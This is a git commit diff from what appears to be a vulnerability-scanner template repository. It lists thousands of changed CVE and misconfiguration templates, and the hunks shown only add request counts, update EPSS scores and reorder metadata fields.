http/cves/2022/CVE-2022-47615.yaml | 4 ++-- http/cves/2022/CVE-2022-47945.yaml | 4 ++-- http/cves/2022/CVE-2022-47966.yaml | 4 ++-- http/cves/2022/CVE-2022-47986.yaml | 4 ++-- http/cves/2022/CVE-2022-48012.yaml | 4 ++-- http/cves/2022/CVE-2022-48165.yaml | 4 ++-- http/cves/2022/CVE-2022-48197.yaml | 4 ++-- http/cves/2022/CVE-2022-4897.yaml | 2 +- http/cves/2023/CVE-2023-0099.yaml | 4 ++-- http/cves/2023/CVE-2023-0126.yaml | 4 ++-- http/cves/2023/CVE-2023-0236.yaml | 4 ++-- http/cves/2023/CVE-2023-0261.yaml | 4 ++-- http/cves/2023/CVE-2023-0297.yaml | 4 ++-- http/cves/2023/CVE-2023-0334.yaml | 2 +- http/cves/2023/CVE-2023-0448.yaml | 4 ++-- http/cves/2023/CVE-2023-0514.yaml | 2 +- http/cves/2023/CVE-2023-0527.yaml | 4 ++-- http/cves/2023/CVE-2023-0552.yaml | 2 +- http/cves/2023/CVE-2023-0562.yaml | 4 ++-- http/cves/2023/CVE-2023-0563.yaml | 4 ++-- http/cves/2023/CVE-2023-0600.yaml | 16 ++++++++-------- http/cves/2023/CVE-2023-0602.yaml | 2 +- http/cves/2023/CVE-2023-0630.yaml | 4 ++-- http/cves/2023/CVE-2023-0669.yaml | 4 ++-- http/cves/2023/CVE-2023-0777.yaml | 4 ++-- http/cves/2023/CVE-2023-0900.yaml | 4 ++-- http/cves/2023/CVE-2023-0942.yaml | 4 ++-- http/cves/2023/CVE-2023-0947.yaml | 4 ++-- http/cves/2023/CVE-2023-0948.yaml | 2 +- http/cves/2023/CVE-2023-0968.yaml | 4 ++-- http/cves/2023/CVE-2023-1020.yaml | 4 ++-- http/cves/2023/CVE-2023-1080.yaml | 4 ++-- http/cves/2023/CVE-2023-1177.yaml | 4 ++-- http/cves/2023/CVE-2023-1263.yaml | 4 ++-- http/cves/2023/CVE-2023-1362.yaml | 2 +- http/cves/2023/CVE-2023-1408.yaml | 4 ++-- http/cves/2023/CVE-2023-1454.yaml | 2 +- http/cves/2023/CVE-2023-1496.yaml | 2 +- http/cves/2023/CVE-2023-1546.yaml | 2 +- http/cves/2023/CVE-2023-1671.yaml | 4 ++-- http/cves/2023/CVE-2023-1698.yaml | 4 ++-- http/cves/2023/CVE-2023-1719.yaml | 2 +- http/cves/2023/CVE-2023-1730.yaml | 4 ++-- http/cves/2023/CVE-2023-1780.yaml | 2 +- http/cves/2023/CVE-2023-1835.yaml | 2 +- http/cves/2023/CVE-2023-1880.yaml | 2 +- http/cves/2023/CVE-2023-1890.yaml | 2 +- http/cves/2023/CVE-2023-20073.yaml | 2 +- http/cves/2023/CVE-2023-2009.yaml | 2 +- http/cves/2023/CVE-2023-20198.yaml | 2 +- http/cves/2023/CVE-2023-2023.yaml | 2 +- http/cves/2023/CVE-2023-20864.yaml | 4 ++-- http/cves/2023/CVE-2023-20887.yaml | 4 ++-- http/cves/2023/CVE-2023-20888.yaml | 4 ++-- http/cves/2023/CVE-2023-20889.yaml | 4 ++-- http/cves/2023/CVE-2023-2122.yaml | 2 +- http/cves/2023/CVE-2023-2130.yaml | 2 +- http/cves/2023/CVE-2023-2178.yaml | 2 +- http/cves/2023/CVE-2023-22232.yaml | 12 +++++++++--- http/cves/2023/CVE-2023-2224.yaml | 2 +- http/cves/2023/CVE-2023-22432.yaml | 4 ++-- http/cves/2023/CVE-2023-22463.yaml | 5 ++--- http/cves/2023/CVE-2023-22478.yaml | 4 ++-- http/cves/2023/CVE-2023-22480.yaml | 4 ++-- http/cves/2023/CVE-2023-22515.yaml | 4 ++-- http/cves/2023/CVE-2023-22518.yaml | 4 ++-- http/cves/2023/CVE-2023-22620.yaml | 4 ++-- http/cves/2023/CVE-2023-2272.yaml | 2 +- http/cves/2023/CVE-2023-22897.yaml | 4 ++-- http/cves/2023/CVE-2023-23161.yaml | 8 ++++---- http/cves/2023/CVE-2023-23333.yaml | 4 ++-- http/cves/2023/CVE-2023-23488.yaml | 4 ++-- http/cves/2023/CVE-2023-23489.yaml | 4 ++-- http/cves/2023/CVE-2023-23491.yaml | 4 ++-- http/cves/2023/CVE-2023-23492.yaml | 4 ++-- http/cves/2023/CVE-2023-2356.yaml | 2 +- http/cves/2023/CVE-2023-23752.yaml | 6 +++--- http/cves/2023/CVE-2023-24044.yaml | 4 ++-- http/cves/2023/CVE-2023-24243.yaml | 4 ++-- http/cves/2023/CVE-2023-24278.yaml | 2 +- http/cves/2023/CVE-2023-24322.yaml | 4 ++-- http/cves/2023/CVE-2023-24488.yaml | 4 ++-- http/cves/2023/CVE-2023-24489.yaml | 4 ++-- http/cves/2023/CVE-2023-24657.yaml | 4 ++-- http/cves/2023/CVE-2023-24733.yaml | 2 +- http/cves/2023/CVE-2023-24735.yaml | 4 ++-- http/cves/2023/CVE-2023-24737.yaml | 2 +- http/cves/2023/CVE-2023-2479.yaml | 2 +- http/cves/2023/CVE-2023-25135.yaml | 4 ++-- http/cves/2023/CVE-2023-25157.yaml | 4 ++-- http/cves/2023/CVE-2023-25346.yaml | 2 +- http/cves/2023/CVE-2023-25573.yaml | 4 ++-- http/cves/2023/CVE-2023-25717.yaml | 4 ++-- http/cves/2023/CVE-2023-26035.yaml | 14 ++++++-------- http/cves/2023/CVE-2023-26067.yaml | 4 ++-- http/cves/2023/CVE-2023-26255.yaml | 2 +- http/cves/2023/CVE-2023-26256.yaml | 2 +- http/cves/2023/CVE-2023-26347.yaml | 4 ++-- http/cves/2023/CVE-2023-26360.yaml | 4 ++-- http/cves/2023/CVE-2023-26469.yaml | 4 ++-- http/cves/2023/CVE-2023-2648.yaml | 2 +- http/cves/2023/CVE-2023-26842.yaml | 2 +- http/cves/2023/CVE-2023-26843.yaml | 2 +- http/cves/2023/CVE-2023-27008.yaml | 2 +- http/cves/2023/CVE-2023-27034.yaml | 2 +- http/cves/2023/CVE-2023-27159.yaml | 4 ++-- http/cves/2023/CVE-2023-27179.yaml | 4 ++-- http/cves/2023/CVE-2023-27292.yaml | 2 +- http/cves/2023/CVE-2023-2732.yaml | 4 ++-- http/cves/2023/CVE-2023-27350.yaml | 4 ++-- http/cves/2023/CVE-2023-27372.yaml | 4 ++-- http/cves/2023/CVE-2023-27482.yaml | 4 ++-- http/cves/2023/CVE-2023-27524.yaml | 6 +++--- http/cves/2023/CVE-2023-27587.yaml | 4 ++-- http/cves/2023/CVE-2023-2766.yaml | 4 ++-- http/cves/2023/CVE-2023-2779.yaml | 4 ++-- http/cves/2023/CVE-2023-2780.yaml | 4 ++-- http/cves/2023/CVE-2023-27922.yaml | 2 +- http/cves/2023/CVE-2023-2796.yaml | 4 ++-- http/cves/2023/CVE-2023-28121.yaml | 4 ++-- http/cves/2023/CVE-2023-2813.yaml | 5 ++--- http/cves/2023/CVE-2023-2822.yaml | 4 ++-- http/cves/2023/CVE-2023-2825.yaml | 4 ++-- http/cves/2023/CVE-2023-28343.yaml | 4 ++-- http/cves/2023/CVE-2023-28432.yaml | 4 ++-- http/cves/2023/CVE-2023-28665.yaml | 2 +- http/cves/2023/CVE-2023-29084.yaml | 4 ++-- http/cves/2023/CVE-2023-29298.yaml | 4 ++-- http/cves/2023/CVE-2023-29300.yaml | 6 +++--- http/cves/2023/CVE-2023-29357.yaml | 6 +++--- http/cves/2023/CVE-2023-29439.yaml | 4 ++-- http/cves/2023/CVE-2023-29489.yaml | 4 ++-- http/cves/2023/CVE-2023-29622.yaml | 4 ++-- http/cves/2023/CVE-2023-29623.yaml | 2 +- http/cves/2023/CVE-2023-2982.yaml | 4 ++-- http/cves/2023/CVE-2023-29887.yaml | 2 +- http/cves/2023/CVE-2023-29919.yaml | 2 +- http/cves/2023/CVE-2023-29922.yaml | 4 ++-- http/cves/2023/CVE-2023-29923.yaml | 2 +- http/cves/2023/CVE-2023-30013.yaml | 4 ++-- http/cves/2023/CVE-2023-30019.yaml | 2 +- http/cves/2023/CVE-2023-30150.yaml | 2 +- http/cves/2023/CVE-2023-30210.yaml | 2 +- http/cves/2023/CVE-2023-30212.yaml | 4 ++-- http/cves/2023/CVE-2023-30256.yaml | 2 +- http/cves/2023/CVE-2023-30258.yaml | 4 ++-- http/cves/2023/CVE-2023-30534.yaml | 13 +++++++++---- http/cves/2023/CVE-2023-30625.yaml | 4 ++-- http/cves/2023/CVE-2023-30777.yaml | 4 ++-- http/cves/2023/CVE-2023-30868.yaml | 2 +- http/cves/2023/CVE-2023-30943.yaml | 4 ++-- http/cves/2023/CVE-2023-31059.yaml | 2 +- http/cves/2023/CVE-2023-31465.yaml | 2 +- http/cves/2023/CVE-2023-31548.yaml | 2 +- http/cves/2023/CVE-2023-3219.yaml | 4 ++-- http/cves/2023/CVE-2023-32235.yaml | 4 ++-- http/cves/2023/CVE-2023-32243.yaml | 2 +- http/cves/2023/CVE-2023-32315.yaml | 4 ++-- http/cves/2023/CVE-2023-32563.yaml | 4 ++-- http/cves/2023/CVE-2023-33338.yaml | 2 +- http/cves/2023/CVE-2023-33405.yaml | 2 +- http/cves/2023/CVE-2023-33439.yaml | 2 +- http/cves/2023/CVE-2023-33440.yaml | 2 +- http/cves/2023/CVE-2023-3345.yaml | 2 +- http/cves/2023/CVE-2023-33510.yaml | 2 +- http/cves/2023/CVE-2023-33568.yaml | 4 ++-- http/cves/2023/CVE-2023-33584.yaml | 2 +- http/cves/2023/CVE-2023-33629.yaml | 4 ++-- http/cves/2023/CVE-2023-3368.yaml | 2 +- http/cves/2023/CVE-2023-33831.yaml | 4 ++-- http/cves/2023/CVE-2023-34124.yaml | 4 ++-- http/cves/2023/CVE-2023-34192.yaml | 4 ++-- http/cves/2023/CVE-2023-34259.yaml | 2 +- http/cves/2023/CVE-2023-34362.yaml | 4 ++-- http/cves/2023/CVE-2023-34537.yaml | 2 +- http/cves/2023/CVE-2023-34598.yaml | 2 +- http/cves/2023/CVE-2023-34599.yaml | 2 +- http/cves/2023/CVE-2023-3460.yaml | 2 +- http/cves/2023/CVE-2023-34659.yaml | 4 ++-- http/cves/2023/CVE-2023-34751.yaml | 2 +- http/cves/2023/CVE-2023-34752.yaml | 2 +- http/cves/2023/CVE-2023-34753.yaml | 2 +- http/cves/2023/CVE-2023-34755.yaml | 2 +- http/cves/2023/CVE-2023-34756.yaml | 2 +- http/cves/2023/CVE-2023-3479.yaml | 2 +- http/cves/2023/CVE-2023-34843.yaml | 2 +- http/cves/2023/CVE-2023-34960.yaml | 4 ++-- http/cves/2023/CVE-2023-35078.yaml | 4 ++-- http/cves/2023/CVE-2023-35082.yaml | 2 +- http/cves/2023/CVE-2023-35813.yaml | 4 ++-- http/cves/2023/CVE-2023-35843.yaml | 4 ++-- http/cves/2023/CVE-2023-35844.yaml | 4 ++-- http/cves/2023/CVE-2023-35885.yaml | 2 +- http/cves/2023/CVE-2023-36144.yaml | 2 +- http/cves/2023/CVE-2023-36287.yaml | 2 +- http/cves/2023/CVE-2023-36289.yaml | 2 +- http/cves/2023/CVE-2023-36306.yaml | 4 ++-- http/cves/2023/CVE-2023-36346.yaml | 2 +- http/cves/2023/CVE-2023-36844.yaml | 4 ++-- http/cves/2023/CVE-2023-36845.yaml | 2 +- http/cves/2023/CVE-2023-36934.yaml | 4 ++-- http/cves/2023/CVE-2023-3710.yaml | 4 ++-- http/cves/2023/CVE-2023-37265.yaml | 4 ++-- http/cves/2023/CVE-2023-37266.yaml | 4 ++-- http/cves/2023/CVE-2023-37270.yaml | 4 ++-- http/cves/2023/CVE-2023-37462.yaml | 4 ++-- http/cves/2023/CVE-2023-37474.yaml | 4 ++-- http/cves/2023/CVE-2023-37580.yaml | 4 ++-- http/cves/2023/CVE-2023-37629.yaml | 4 ++-- http/cves/2023/CVE-2023-3765.yaml | 2 +- http/cves/2023/CVE-2023-37679.yaml | 4 ++-- http/cves/2023/CVE-2023-37728.yaml | 2 +- http/cves/2023/CVE-2023-37979.yaml | 4 ++-- http/cves/2023/CVE-2023-38035.yaml | 4 ++-- http/cves/2023/CVE-2023-38205.yaml | 4 ++-- http/cves/2023/CVE-2023-3836.yaml | 4 ++-- http/cves/2023/CVE-2023-3843.yaml | 2 +- http/cves/2023/CVE-2023-38433.yaml | 4 ++-- http/cves/2023/CVE-2023-3844.yaml | 2 +- http/cves/2023/CVE-2023-3845.yaml | 2 +- http/cves/2023/CVE-2023-3846.yaml | 2 +- http/cves/2023/CVE-2023-3847.yaml | 2 +- http/cves/2023/CVE-2023-3848.yaml | 2 +- http/cves/2023/CVE-2023-3849.yaml | 2 +- http/cves/2023/CVE-2023-38501.yaml | 4 ++-- http/cves/2023/CVE-2023-38646.yaml | 4 ++-- http/cves/2023/CVE-2023-39002.yaml | 2 +- http/cves/2023/CVE-2023-39026.yaml | 4 ++-- http/cves/2023/CVE-2023-39108.yaml | 2 +- http/cves/2023/CVE-2023-39109.yaml | 2 +- http/cves/2023/CVE-2023-39110.yaml | 2 +- http/cves/2023/CVE-2023-39141.yaml | 2 +- http/cves/2023/CVE-2023-39143.yaml | 4 ++-- http/cves/2023/CVE-2023-3936.yaml | 2 +- http/cves/2023/CVE-2023-39361.yaml | 4 ++-- http/cves/2023/CVE-2023-39598.yaml | 4 ++-- http/cves/2023/CVE-2023-39600.yaml | 2 +- http/cves/2023/CVE-2023-39676.yaml | 2 +- http/cves/2023/CVE-2023-39677.yaml | 2 +- http/cves/2023/CVE-2023-39700.yaml | 2 +- http/cves/2023/CVE-2023-39796.yaml | 4 ++-- http/cves/2023/CVE-2023-40208.yaml | 2 +- http/cves/2023/CVE-2023-40779.yaml | 4 ++-- http/cves/2023/CVE-2023-4110.yaml | 4 ++-- http/cves/2023/CVE-2023-41109.yaml | 10 ++++++---- http/cves/2023/CVE-2023-4111.yaml | 4 ++-- http/cves/2023/CVE-2023-4112.yaml | 4 ++-- http/cves/2023/CVE-2023-4113.yaml | 4 ++-- http/cves/2023/CVE-2023-4114.yaml | 4 ++-- http/cves/2023/CVE-2023-4115.yaml | 4 ++-- http/cves/2023/CVE-2023-4116.yaml | 4 ++-- http/cves/2023/CVE-2023-41265.yaml | 5 +++-- http/cves/2023/CVE-2023-41266.yaml | 4 ++-- http/cves/2023/CVE-2023-4148.yaml | 2 +- http/cves/2023/CVE-2023-41538.yaml | 2 +- http/cves/2023/CVE-2023-41642.yaml | 2 +- http/cves/2023/CVE-2023-4168.yaml | 4 ++-- http/cves/2023/CVE-2023-4169.yaml | 4 ++-- http/cves/2023/CVE-2023-4173.yaml | 4 ++-- http/cves/2023/CVE-2023-4174.yaml | 2 +- http/cves/2023/CVE-2023-41763.yaml | 11 ++++++++++- http/cves/2023/CVE-2023-41892.yaml | 4 ++-- http/cves/2023/CVE-2023-42343.yaml | 2 +- http/cves/2023/CVE-2023-42442.yaml | 4 ++-- http/cves/2023/CVE-2023-42793.yaml | 4 ++-- http/cves/2023/CVE-2023-43261.yaml | 2 +- http/cves/2023/CVE-2023-43325.yaml | 2 +- http/cves/2023/CVE-2023-43326.yaml | 2 +- http/cves/2023/CVE-2023-43795.yaml | 4 ++-- http/cves/2023/CVE-2023-4415.yaml | 2 +- http/cves/2023/CVE-2023-44353.yaml | 9 ++++----- http/cves/2023/CVE-2023-4451.yaml | 2 +- http/cves/2023/CVE-2023-4547.yaml | 2 +- http/cves/2023/CVE-2023-45542.yaml | 4 ++-- http/cves/2023/CVE-2023-4568.yaml | 2 +- http/cves/2023/CVE-2023-45852.yaml | 4 ++-- http/cves/2023/CVE-2023-4596.yaml | 2 +- http/cves/2023/CVE-2023-4634.yaml | 4 ++-- http/cves/2023/CVE-2023-46574.yaml | 10 ++++------ http/cves/2023/CVE-2023-46747.yaml | 2 +- http/cves/2023/CVE-2023-4714.yaml | 4 ++-- http/cves/2023/CVE-2023-47246.yaml | 4 ++-- http/cves/2023/CVE-2023-49070.yaml | 4 ++-- http/cves/2023/CVE-2023-49103.yaml | 2 +- http/cves/2023/CVE-2023-4966.yaml | 4 ++-- http/cves/2023/CVE-2023-4974.yaml | 4 ++-- http/cves/2023/CVE-2023-5074.yaml | 2 +- http/cves/2023/CVE-2023-50917.yaml | 8 ++++---- http/cves/2023/CVE-2023-50968.yaml | 18 +++++++++++------- http/cves/2023/CVE-2023-51467.yaml | 9 +++++++-- http/cves/2023/CVE-2023-5244.yaml | 2 +- http/cves/2023/CVE-2023-5360.yaml | 6 +++--- http/cves/2023/CVE-2023-5375.yaml | 2 +- http/cves/2023/CVE-2023-5556.yaml | 5 ++--- http/cves/2023/CVE-2023-6018.yaml | 3 +-- http/cves/2023/CVE-2023-6020.yaml | 4 ++-- http/cves/2023/CVE-2023-6021.yaml | 2 +- http/cves/2023/CVE-2023-6038.yaml | 14 +++++++------- http/cves/2023/CVE-2023-6063.yaml | 13 ++++++------- http/cves/2023/CVE-2023-6379.yaml | 10 ++++++---- http/cves/2023/CVE-2023-6380.yaml | 10 ++++++++-- http/cves/2023/CVE-2023-6553.yaml | 5 ++--- http/cves/2023/CVE-2023-6623.yaml | 4 ++-- http/cves/2023/CVE-2023-7028.yaml | 8 ++------ http/cves/2024/CVE-2024-0352.yaml | 10 ++++++---- .../camunda/camunda-default-login.yaml | 1 + .../exposed-panels/onlyoffice-login-panel.yaml | 2 +- http/exposed-panels/vue-pacs-panel.yaml | 2 +- http/exposed-panels/woodwing-panel.yaml | 1 + http/exposures/backups/zip-backup-files.yaml | 2 +- http/exposures/docker-daemon-exposed.yaml | 4 ++-- .../apache/apache-server-status.yaml | 4 ++-- .../aws/cdn-cache-poisoning.yaml | 6 ++---- .../gitlab/gitlab-public-signup.yaml | 2 +- .../h2o/h2o-arbitary-file-read.yaml | 2 +- http/misconfiguration/h2o/h2o-dashboard.yaml | 2 +- .../installer/espocrm-installer.yaml | 2 +- .../misconfiguration/mixed-active-content.yaml | 4 ++-- .../mixed-passive-content.yaml | 4 ++-- .../php/php-composer-binary.yaml | 2 +- http/misconfiguration/woodwing-git.yaml | 1 + http/misconfiguration/woodwing-phpinfo.yaml | 1 + http/osint/piratebay.yaml | 2 +- http/technologies/bamboo-detect.yaml | 3 ++- http/technologies/iparapheur-detect.yaml | 2 +- http/token-spray/api-openai.yaml | 2 +- .../apache/apache-druid-kafka-connect-rce.yaml | 4 ++-- .../dlink/dlink-netgear-xss.yaml | 2 +- .../ecstatic/node-ecstatic-internal-path.yaml | 3 +-- http/vulnerabilities/jinhe/jinhe-jc6-sqli.yaml | 3 +-- .../other/sslvpn-client-rce.yaml | 3 +-- .../ruijie/ruijie-nmc-sync-rce.yaml | 3 +-- .../ruijie/ruijie-rg-eg-web-mis-rce.yaml | 6 ++---- .../vbulletin/vbulletin-ajaxreg-sqli.yaml | 4 ++-- javascript/cves/2016/CVE-2016-8706.yaml | 3 +-- javascript/cves/2023/CVE-2023-34039.yaml | 5 ++--- javascript/cves/2023/CVE-2023-46604.yaml | 5 ++--- .../network/smb/smb-anonymous-access.yaml | 4 ++-- javascript/network/smb/smb-shares.yaml | 4 ++-- .../network/smb/smb-signing-not-required.yaml | 4 ++-- javascript/network/smb/smb2-capabilities.yaml | 3 ++- network/cves/2016/CVE-2016-2004.yaml | 5 +++-- network/cves/2016/CVE-2016-3510.yaml | 16 +++++++++++----- network/cves/2017/CVE-2017-3881.yaml | 3 ++- network/cves/2017/CVE-2017-5645.yaml | 3 ++- network/cves/2018/CVE-2018-2628.yaml | 2 +- network/cves/2018/CVE-2018-2893.yaml | 7 ++++++- network/cves/2020/CVE-2020-11981.yaml | 7 ++++++- network/cves/2020/CVE-2020-1938.yaml | 4 ++-- network/cves/2020/CVE-2020-7247.yaml | 5 +++-- network/cves/2021/CVE-2021-44521.yaml | 3 ++- network/cves/2022/CVE-2022-24706.yaml | 4 ++-- network/cves/2022/CVE-2022-31793.yaml | 4 ++-- network/misconfig/erlang-daemon.yaml | 5 +++-- 2279 files changed, 3436 insertions(+), 3353 deletions(-) diff --git a/cloud/enum/azure-vm-cloud-enum.yaml b/cloud/enum/azure-vm-cloud-enum.yaml index 7ed0d03f3c..ffeda2541c 100644 --- a/cloud/enum/azure-vm-cloud-enum.yaml +++ b/cloud/enum/azure-vm-cloud-enum.yaml @@ -8,6 +8,7 @@ info: Searches for Azure virtual machines via their registered DNS names. metadata: verified: true + max-request: 1 tags: cloud,cloud-enum,azure self-contained: true diff --git a/cloud/enum/azure-website-enum.yaml b/cloud/enum/azure-website-enum.yaml index 94737b9889..f4e00a8375 100644 --- a/cloud/enum/azure-website-enum.yaml +++ b/cloud/enum/azure-website-enum.yaml @@ -8,6 +8,7 @@ info: Searches for Azure websites that are registered and responding. metadata: verified: true + max-request: 1 tags: cloud,azure self-contained: true diff --git a/cloud/enum/gcp-app-engine-enum.yaml b/cloud/enum/gcp-app-engine-enum.yaml index 25da290f22..ccafdb7c3b 100644 --- a/cloud/enum/gcp-app-engine-enum.yaml +++ b/cloud/enum/gcp-app-engine-enum.yaml @@ -8,6 +8,7 @@ info: Searches for App Engine Apps in GCP. metadata: verified: true + max-request: 1 tags: cloud,cloud-enum,gcp self-contained: true diff --git a/cloud/enum/gcp-bucket-enum.yaml b/cloud/enum/gcp-bucket-enum.yaml index 6889edcaad..a6ab5adab0 100644 --- a/cloud/enum/gcp-bucket-enum.yaml +++ b/cloud/enum/gcp-bucket-enum.yaml @@ -8,6 +8,7 @@ info: Searches for open and protected buckets in GCP. metadata: verified: true + max-request: 1 tags: cloud,cloud-enum,gcp self-contained: true diff --git a/cloud/enum/gcp-firebase-app-enum.yaml b/cloud/enum/gcp-firebase-app-enum.yaml index 45a6277ff7..ddbcc30957 100644 --- a/cloud/enum/gcp-firebase-app-enum.yaml +++ b/cloud/enum/gcp-firebase-app-enum.yaml @@ -8,6 +8,7 @@ info: Searches for Firebase Apps in GCP. metadata: verified: true + max-request: 1 tags: cloud,cloud-enum,gcp self-contained: true diff --git a/cloud/enum/gcp-firebase-rtdb-enum.yaml b/cloud/enum/gcp-firebase-rtdb-enum.yaml index 27a2ee646e..8393680173 100644 --- a/cloud/enum/gcp-firebase-rtdb-enum.yaml +++ b/cloud/enum/gcp-firebase-rtdb-enum.yaml @@ -8,6 +8,7 @@ info: Searches for Firebase Realtime Databases in GCP. metadata: verified: true + max-request: 1 tags: cloud,cloud-enum,gcp self-contained: true diff --git a/code/cves/2023/CVE-2023-49105.yaml b/code/cves/2023/CVE-2023-49105.yaml index 4cdc94f210..342690ac65 100644 --- a/code/cves/2023/CVE-2023-49105.yaml +++ b/code/cves/2023/CVE-2023-49105.yaml @@ -15,15 +15,15 @@ info: cvss-score: 9.8 cve-id: CVE-2023-49105 cwe-id: CWE-287 + cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:* epss-score: 0.00091 epss-percentile: 0.38353 - cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: owncloud + max-request: 2 product: owncloud shodan-query: title:"owncloud" + vendor: owncloud + verified: true tags: cve,cve2023,owncloud,code,auth-bypass variables: diff --git a/headless/cves/2018/CVE-2018-25031.yaml b/headless/cves/2018/CVE-2018-25031.yaml index 48cf8c8b71..bf9de401ab 100644 --- a/headless/cves/2018/CVE-2018-25031.yaml +++ b/headless/cves/2018/CVE-2018-25031.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-25031 cwe-id: CWE-20 epss-score: 0.00265 - epss-percentile: 0.63947 + epss-percentile: 0.64105 cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,7 +30,6 @@ info: shodan-query: http.component:"Swagger" fofa-query: icon_hash="-1180440057" tags: cve,cve2018,headless,swagger,xss - headless: - steps: - args: diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index 6e8ab39c98..df301a085b 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2000-0114 cwe-id: NVD-CWE-Other epss-score: 0.09258 - epss-percentile: 0.94068 + epss-percentile: 0.94099 cpe: cpe:2.3:a:microsoft:internet_information_server:3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index 10c5c7f16a..b8dc5888d6 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2001-0537 cwe-id: CWE-287 epss-score: 0.88063 - epss-percentile: 0.98379 + epss-percentile: 0.98412 cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 4cc511bf5f..e7b5919a47 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2002-1131 cwe-id: CWE-80 epss-score: 0.06018 - epss-percentile: 0.92707 + epss-percentile: 0.92744 cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 5 diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index dd72a4ab41..79c251cbae 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2004-0519 cwe-id: NVD-CWE-Other epss-score: 0.02285 - epss-percentile: 0.88467 + epss-percentile: 0.88521 cpe: cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index 108c014d2e..622ee34793 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2004-1965 cwe-id: NVD-CWE-Other epss-score: 0.0113 - epss-percentile: 0.82982 + epss-percentile: 0.83082 cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index 5f20ec31d2..37a3e391e6 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2005-2428 cwe-id: CWE-200 epss-score: 0.01188 - epss-percentile: 0.83464 + epss-percentile: 0.83563 cpe: cpe:2.3:a:ibm:lotus_domino:5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml index 20a0675c96..f0e5f6285a 100644 --- a/http/cves/2005/CVE-2005-3344.yaml +++ b/http/cves/2005/CVE-2005-3344.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2005-3344 cwe-id: NVD-CWE-Other epss-score: 0.02158 - epss-percentile: 0.88112 + epss-percentile: 0.88169 cpe: cpe:2.3:a:horde:horde:3.0.4:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index a7f24f1089..fcc07f8047 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2005-3634 cwe-id: NVD-CWE-Other epss-score: 0.02843 - epss-percentile: 0.89594 + epss-percentile: 0.8965 cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml index 3ca9ec067a..409dc9f51f 100644 --- a/http/cves/2005/CVE-2005-4385.yaml +++ b/http/cves/2005/CVE-2005-4385.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2005-4385 cwe-id: NVD-CWE-Other epss-score: 0.00294 - epss-percentile: 0.65791 + epss-percentile: 0.65964 cpe: cpe:2.3:a:cofax:cofax:1.9.9c:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml index 4e07c04fa4..6b318093fe 100644 --- a/http/cves/2006/CVE-2006-1681.yaml +++ b/http/cves/2006/CVE-2006-1681.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2006-1681 cwe-id: NVD-CWE-Other epss-score: 0.01015 - epss-percentile: 0.81994 + epss-percentile: 0.82067 cpe: cpe:2.3:a:cherokee:cherokee_httpd:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index ddc0cd6633..a57d2db84b 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2006-2842 cwe-id: CWE-22 - epss-score: 0.17301 - epss-percentile: 0.95581 + epss-score: 0.25691 + epss-percentile: 0.96267 cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index 9dc53ec468..d0c6996e64 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.8 